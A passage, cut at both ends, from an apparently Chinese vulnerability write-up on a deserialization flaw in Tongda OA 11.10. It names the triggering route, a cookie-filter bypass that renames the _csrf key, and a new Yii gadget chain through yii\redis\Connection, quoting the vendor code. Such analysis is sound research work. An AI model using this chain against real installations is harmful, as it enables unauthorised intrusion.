break-all;">index.php</p>，从而可以触发<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">general/appbuilder/views/layouts/main.php</p>模板。</div><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><p style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">...... <span style="color: #c678dd;line-height: 26px;">else</span> {  $url = $_SERVER[<span style="color: #98c379;line-height: 26px;">"REQUEST_URI"</span>]; <span style="color: #5c6370;font-style: italic;line-height: 26px;">//获取路径</span>  $strurl = substr($url, <span style="color: #d19a66;line-height: 26px;">0</span>, strpos($url, <span style="color: #98c379;line-height: 26px;">"?"</span>)); <span style="color: #5c6370;font-style: italic;line-height: 26px;">//分割路径和uri参数</span>  <span style="color: #c678dd;line-height: 26px;">if</span> (strpos($strurl, <span style="color: #98c379;line-height: 26px;">"/portal/"</span>) !== <span style="color: #c678dd;line-height: 26px;">false</span>) {   <span style="color: #c678dd;line-height: 26px;">if</span> (strpos($strurl, <span style="color: #98c379;line-height: 26px;">"/gateway/"</span>) === <span style="color: #c678dd;line-height: 26px;">false</span>) {    header(<span style="color: #98c379;line-height: 26px;">"Location:/index.php"</span>);    sess_close();    <span style="color: #c678dd;line-height: 26px;">exit</span>();   }   <span style="color: #c678dd;line-height: 26px;">else</span> <span style="color: #c678dd;line-height: 26px;">if</span> (strpos($strurl, <span style="color: #98c379;line-height: 26px;">"/gateway/saveportal"</span>) !== <span style="color: #c678dd;line-height: 26px;">false</span>) {    header(<span style="color: #98c379;line-height: 26px;">"Location:/index.php"</span>);    sess_close();    <span style="color: #c678dd;line-height: 26px;">exit</span>();   }   <span style="color: #c678dd;line-height: 26px;">else</span> <span style="color: #c678dd;line-height: 26px;">if</span> (strpos($url, <span style="color: #98c379;line-height: 26px;">"edit"</span>) !== <span style="color: #c678dd;line-height: 26px;">false</span>) {    header(<span style="color: #98c379;line-height: 26px;">"Location:/index.php"</span>);    sess_close();    <span style="color: #c678dd;line-height: 26px;">exit</span>();   }   <span style="color: #c678dd;line-height: 26px;">else</span> <span style="color: #c678dd;line-height: 26px;">if</span> (strpos($url, <span style="color: #98c379;line-height: 26px;">"uploadfile"</span>) !== <span style="color: #c678dd;line-height: 26px;">false</span>) {    header(<span style="color: #98c379;line-height: 26px;">"Location:/index.php"</span>);    sess_close();    <span style="color: #c678dd;line-height: 26px;">exit</span>();   }   <span style="color: #c678dd;line-height: 26px;">else</span> <span style="color: #c678dd;line-height: 26px;">if</span> (strpos($url, <span style="color: #98c379;line-height: 26px;">"uploadportalfile"</span>) !== <span style="color: #c678dd;line-height: 26px;">false</span>) {    header(<span style="color: #98c379;line-height: 26px;">"Location:/index.php"</span>);    sess_close();    <span style="color: #c678dd;line-height: 26px;">exit</span>();   }   <span style="color: #c678dd;line-height: 26px;">else</span> <span style="color: #c678dd;line-height: 26px;">if</span> (strpos($url, <span style="color: #98c379;line-height: 26px;">"uploadpicture"</span>) !== <span style="color: #c678dd;line-height: 26px;">false</span>) {    header(<span style="color: #98c379;line-height: 26px;">"Location:/index.php"</span>);    sess_close();    <span style="color: #c678dd;line-height: 26px;">exit</span>();   }   <span style="color: #c678dd;line-height: 26px;">else</span> <span style="color: #c678dd;line-height: 26px;">if</span> (strpos($url, <span style="color: #98c379;line-height: 26px;">"dologin"</span>) !== <span style="color: #c678dd;line-height: 26px;">false</span>) {    header(<span style="color: #98c379;line-height: 26px;">"Location:/index.php"</span>);    sess_close();    <span style="color: #c678dd;line-height: 26px;">exit</span>();   }  }    ......</p></pre><div data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">因此，触发漏洞的路由是<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">/general/appbuilder/portal/gateway/?</p>。</div><div data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">inc/common.inc.php</p>可以看到通达OA有全局的addslashes过滤，对Cookie中过滤。传入payload的时候将<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">_csrf</p>改为<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">_GET、_POST</p>等就可以绕过。</div><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><p style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;"><span style="color: #c678dd;line-height: 26px;">if</span> (<span style="color: #d19a66;line-height: 26px;">0</span> < count($_COOKIE)) {  <span style="color: #c678dd;line-height: 26px;">foreach</span> ($_COOKIE <span style="color: #c678dd;line-height: 26px;">as</span> $s_key => $s_value ) {    <span style="color: #c678dd;line-height: 26px;">if</span> ((substr($s_key, <span style="color: #d19a66;line-height: 26px;">0</span>, <span style="color: #d19a66;line-height: 26px;">7</span>) == <span style="color: #98c379;line-height: 26px;">"_SERVER"</span>) || (substr($s_key, <span style="color: #d19a66;line-height: 26px;">0</span>, <span style="color: #d19a66;line-height: 26px;">8</span>) == <span style="color: #98c379;line-height: 26px;">"_SESSION"</span>) || (substr($s_key, <span style="color: #d19a66;line-height: 26px;">0</span>, <span style="color: #d19a66;line-height: 26px;">7</span>) == <span style="color: #98c379;line-height: 26px;">"_COOKIE"</span>) || (substr($s_key, <span style="color: #d19a66;line-height: 26px;">0</span>, <span style="color: #d19a66;line-height: 26px;">4</span>) == <span style="color: #98c379;line-height: 26px;">"_GET"</span>) || (substr($s_key, <span style="color: #d19a66;line-height: 26px;">0</span>, <span style="color: #d19a66;line-height: 26px;">5</span>) == <span style="color: #98c379;line-height: 26px;">"_POST"</span>) || (substr($s_key, <span style="color: #d19a66;line-height: 26px;">0</span>, <span style="color: #d19a66;line-height: 26px;">6</span>) == <span style="color: #98c379;line-height: 26px;">"_FILES"</span>)) {      <span style="color: #c678dd;line-height: 26px;">continue</span>;    }    <span style="color: #c678dd;line-height: 26px;">if</span> (!is_array($s_value)) {      $_COOKIE[$s_key] = addslashes(strip_tags($s_value));    }    $s_key = $_COOKIE[$s_key];  }  reset($_COOKIE);}</p></pre><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 20px;">3.yii 反序列化链</h3><div data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">yii常见的反序列化起点是利用<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">yii\db\BatchQueryResult</p>的。<strong>其中</strong><strong style="color: black;">yii框架POP1链条</strong><strong>差不多如下：</strong><p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">**yii\db\BatchQueryResult-Faker\Generator-yii\rest\CreateAction**</p><strong>，但是通达oa里并没有用</strong><p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">**Faker\Generator**</p><strong>，而且好多yii反序列化链涉及的类都通达oa都没有，因此这里需要重新找一条链。</strong></div><div data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">yii\db\BatchQueryResult</p>的<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">__destruct</p>调用的<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">reset</p>方法，其中<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">$this->_dataReader</p>可控，<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">$this->_dataReader->close()</p>可以理解为<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">可控类->close()</p>。全局搜索到<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">yii\db\DataReader</p>存在<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">close()</p>方法。</div><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><p style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;"><span style="color: #c678dd;line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">function</span> <span style="color: #61aeee;line-height: 26px;">__destruct</span><span style="line-height: 26px;">()</span>    </span>{        <span style="color: #5c6370;font-style: italic;line-height: 26px;">// make sure cursor is closed</span>        <span style="color: #c678dd;line-height: 26px;">$this</span>->reset();    }<span style="color: #c678dd;line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">function</span> <span style="color: #61aeee;line-height: 26px;">reset</span><span style="line-height: 26px;">()</span>    </span>{        <span style="color: #c678dd;line-height: 26px;">if</span> (<span style="color: #c678dd;line-height: 26px;">$this</span>->_dataReader !== <span style="color: #c678dd;line-height: 26px;">null</span>) {             <span style="color: #c678dd;line-height: 26px;">$this</span>->_dataReader->close();        }        <span style="color: #c678dd;line-height: 26px;">$this</span>->_dataReader = <span style="color: #c678dd;line-height: 26px;">null</span>;        <span style="color: #c678dd;line-height: 26px;">$this</span>->_batch = <span style="color: #c678dd;line-height: 26px;">null</span>;        <span style="color: #c678dd;line-height: 26px;">$this</span>->_value = <span style="color: #c678dd;line-height: 26px;">null</span>;        <span style="color: #c678dd;line-height: 26px;">$this</span>->_key = <span style="color: #c678dd;line-height: 26px;">null</span>;    }</p></pre><div data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">因此，可设置<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">$this->_dataReader=new DataReader()</p>从而触发调用其<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">close</p>方法，进入后<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">$this->_statement</p>可控，同样是<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">可控类->closeCursor()</p>，但是全局搜索没找到什么对应的类。尝试找带有<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">call</p>方法的类，通过调用其不存在的<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">closeCursor</p>，触发<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">call</p>方法。</div><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><p style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;"><span style="color: #c678dd;line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">function</span> <span style="color: #61aeee;line-height: 26px;">close</span><span style="line-height: 26px;">()</span>    </span>{        <span style="color: #c678dd;line-height: 26px;">$this</span>->_statement->closeCursor();<span style="color: #5c6370;font-style: italic;line-height: 26px;">//$this->_statement = new Connection();</span>        <span style="color: #c678dd;line-height: 26px;">$this</span>->_closed = <span style="color: #c678dd;line-height: 26px;">true</span>;    }</p></pre><div data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在通达oa 11.10全局搜索中找到<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">yii2</p>框架还用了<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">yii2-redis</p>库，在<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">yii2-redis</p>里面找到<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">yii\redis\Connection</p>类存在<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">call</p>方法。</div><p style="text-align: center;"></p><div data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">打开后发现代码由于解密问题有乱码问题，找到对应的yii2-redis仓库下载对应版本的源码（<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">inc/vendor/yii2/yiisoft/extensions.php</p>页面可查看<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">yii2-redis</p>版本为<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">2.0.6</p>）。<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">$redisCommand=$name='closeCursor'</p>转换为大写，再与<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">$this->redisCommands</p>比对，查看是否存在其中，而<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">$this->redisCommands</p>可控，可参照其默认值形式，设置为<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">CLOSE CURSOR</p>，从而可进入<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">executeCommand</p>。</div><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><p style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;"><span style="color: #c678dd;line-height: 26px;">public</span> $redisCommands = [        <span style="color: #98c379;line-height: 26px;">'APPEND'</span>, <span style="color: #5c6370;font-style: italic;line-height: 26px;">// Append a value to a key</span>        <span style="color: #98c379;line-height: 26px;">'AUTH'</span>, <span style="color: #5c6370;font-style: italic;line-height: 26px;">// Authenticate to the server</span>        <span style="color: #98c379;line-height: 26px;">'BGREWRITEAOF'</span>, <span style="color: #5c6370;font-style: italic;line-height: 26px;">// Asynchronously rewrite the append-only file</span>        <span style="color: #98c379;line-height: 26px;">'BGSAVE'</span>, <span style="color: #5c6370;font-style: italic;line-height: 26px;">// Asynchronously save the dataset to disk</span>......    ];<span style="color: #c678dd;line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">function</span> <span style="color: #61aeee;line-height: 26px;">__call</span><span style="line-height: 26px;">($name, $params)</span>//$<span style="color: #61aeee;line-height: 26px;">name</span>=<span style="color: #61aeee;line-height: 26px;">closeCursor</span>,$<span style="color: #61aeee;line-height: 26px;">params</span>=<span style="color: #61aeee;line-height: 26px;">null</span>    </span>{        $redisCommand = strtoupper(Inflector::camel2words($name, <span style="color: #c678dd;line-height: 26px;">false</span>));<span style="color: #5c6370;font-style: italic;line-height: 26px;">//CLOSECURSOR</span>        <span style="color: #c678dd;line-height: 26px;">if</span> (in_array($redisCommand, <span style="color: #c678dd;line-height: 26px;">$this</span>->redisCommands)) {            <span style="color: #c678dd;line-height: 26px;">return</span> <span style="color: #c678dd;line-height: 26px;">$this</span>->executeCommand($redisCommand, $params);        }        <span style="color: #c678dd;line-height: 26px;">return</span> <span style="color: #c678dd;line-height: 26px;">parent</span>::__call($name, $params);    }</p></pre><div data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">executeCommand</p>调用<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">open</p>方法，跟进发现<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">$this->_socket</p>可控，为保证代码继续运行这里要设置为<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">false</p>（默认初始化值为false）。<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">$connection</p>由<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">hostname、port、database</p>拼接，每个变量都可控，然后后续进行socket的链接。由于通达一体包系统环境一般是win系统，所以设置<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">$this->unixSocket</p>为false（可控）就能进入win下tcp链接。这里只要连通就可以让<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">$this->_socket</p>为true进入if分支。if分之内前面三个if条件<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">$this->dataTimeout、$this->password、$this->database</p>都可控，这三个分支调用的不是<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">executeCommand</p>的递归就是又进行socket链接都不符合情况，所以需要设置为null，才能保证进入<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">initConnection()</p>。</div><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><p style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;"><span style="color: #c678dd;line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">function</span> <span style="color: #61aeee;line-height: 26px;">executeCommand</span><span style="line-height: 26px;">($name, $params = [])</span>    </span>{        <span style="color: #c678dd;line-height: 26px;">$this</span>->open();......    }<span style="color: #c678dd;line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">function</span> <span style="color: #61aeee;line-height: 26px;">open</span><span style="line-height: 26px;">()</span>    </span>{        <span style="color: #c678dd;line-height: 26px;">if</span> (<span style="color: #c678dd;line-height: 26px;">$this</span>->_socket !== <span style="color: #c678dd;line-height: 26px;">false</span>) {            <span style="color: #c678dd;line-height: 26px;">return</span>;        }        $connection = (<span style="color: #c678dd;line-height: 26px;">$this</span>->unixSocket ?: <span style="color: #c678dd;line-height: 26px;">$this</span>->hostname . <span style="color: #98c379;line-height: 26px;">':'</span> . <span style="color: #c678dd;line-height: 26px;">$this</span>->port) . <span style="color: #98c379;line-height: 26px;">', database='</span> . <span style="color: #c678dd;line-height: 26px;">$this</span>->database;        \Yii::trace(<span style="color: #98c379;line-height: 26px;">'Opening redis DB connection: '</span> . $connection, <span style="color: #c678dd;line-height: 26px;">__METHOD__</span>);        <span style="color: #c678dd;line-height: 26px;">$this</span>->_socket = @stream_socket_client(            <span style="color: #c678dd;line-height: 26px;">$this</span>->unixSocket ? <span style="color: #98c379;line-height: 26px;">'unix://'</span> . <span style="color: #c678dd;line-height: 26px;">$this</span>->unixSocket : <span style="color: #98c379;line-height: 26px;">'tcp://'</span> . <span style="color: #c678dd;line-height: 26px;">$this</span>->hostname . <span style="color: #98c379;line-height: 26px;">':'</span> . <span style="color: #c678dd;line-height: 26px;">$this</span>->port,            $errorNumber,            $errorDescription,            <span style="color: #c678dd;line-height: 26px;">$this</span>->connectionTimeout ? <span style="color: #c678dd;line-height: 26px;">$this</span>->connectionTimeout : ini_get(<span style="color: #98c379;line-height: 26px;">'default_socket_timeout'</span>),            <span style="color: #c678dd;line-height: 26px;">$this</span>->socketClientFlags        );        <span style="color: #c678dd;line-height: 26px;">if</span> (<span style="color: #c678dd;line-height: 26px;">$this</span>->_socket) {            <span style="color: #c678dd;line-height: 26px;">if</span> (<span style="color: #c678dd;line-height: 26px;">$this</span>->dataTimeout !== <span style="color: #c678dd;line-height: 26px;">null</span>) {                stream_set_timeout(<span style="color: #c678dd;line-height: 26px;">$this</span>->_socket, $timeout = (int) <span style="color: #c678dd;line-height: 26px;">$this</span>->dataTimeout, (int) ((<span style="color: #c678dd;line-height: 26px;">$this</span>->dataTimeout - $timeout) * <span style="color: #d19a66;line-height: 26px;">1000000</span>));            }            <span style="color: #c678dd;line-height: 26px;">if</span> (<span style="color: #c678dd;line-height: 26px;">$this</span>->password !== <span style="color: #c678dd;line-height: 26px;">null</span>) {                <span style="color: #c678dd;line-height: 26px;">$this</span>->executeCommand(<span style="color: #98c379;line-height: 26px;">'AUTH'</span>, [<span style="color: #c678dd;line-height: 26px;">$this</span>->password]);            }            <span style="color: #c678dd;line-height: 26px;">if</span> (<span style="color: #c678dd;line-height: 26px;">$this</span>->database !== <span style="color: #c678dd;line-height: 26px;">null</span>) {                <span style="color: #c678dd;line-height: 26px;">$this</span>->executeCommand(<span style="color: #98c379;line-height: 26px;">'SELECT'</span>, [<span style="color: #c678dd;line-height: 26px;">$this</span>->database]);            }            <span style="color: #c678dd;line-height: 26px;">$this</span>->initConnection();        }    ......}  </p></pre><div data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">initConnection()</p>实际调用的是<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, 